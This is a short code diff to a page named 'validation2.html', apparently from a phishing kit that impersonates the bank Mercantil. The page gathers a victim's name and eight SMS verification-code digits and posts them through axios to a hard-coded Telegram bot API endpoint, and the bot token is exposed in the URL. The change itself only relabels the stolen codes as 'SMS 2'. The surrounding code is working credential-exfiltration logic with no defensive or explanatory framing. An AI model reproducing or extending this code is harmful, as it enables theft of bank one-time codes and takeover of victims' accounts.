--- a/assets/validation2.html
+++ b/assets/validation2.html
@@ -263,7 +263,7 @@
       const sms6 = document.querySelector("#input6").value;
       const sms7 = document.querySelector("#input7").value;
       const sms8 = document.querySelector("#input8").value;
-      const message = " ------ Mercantil ------ Nombre: " + nombre + " ------ SMS: " + sms1 + sms2 + sms3 + sms4 + sms5 + sms6 + sms7 + sms8;
+      const message = " ------ Mercantil ------ Nombre: " + nombre + " ------ SMS 2: " + sms1 + sms2 + sms3 + sms4 + sms5 + sms6 + sms7 + sms8;
       axios
       .post(
                         "https://api.telegram.org/bot7294657704:AAGNAGJL3wK3W8xjtwcETkspzUmflnH2mjg/sendMessage",
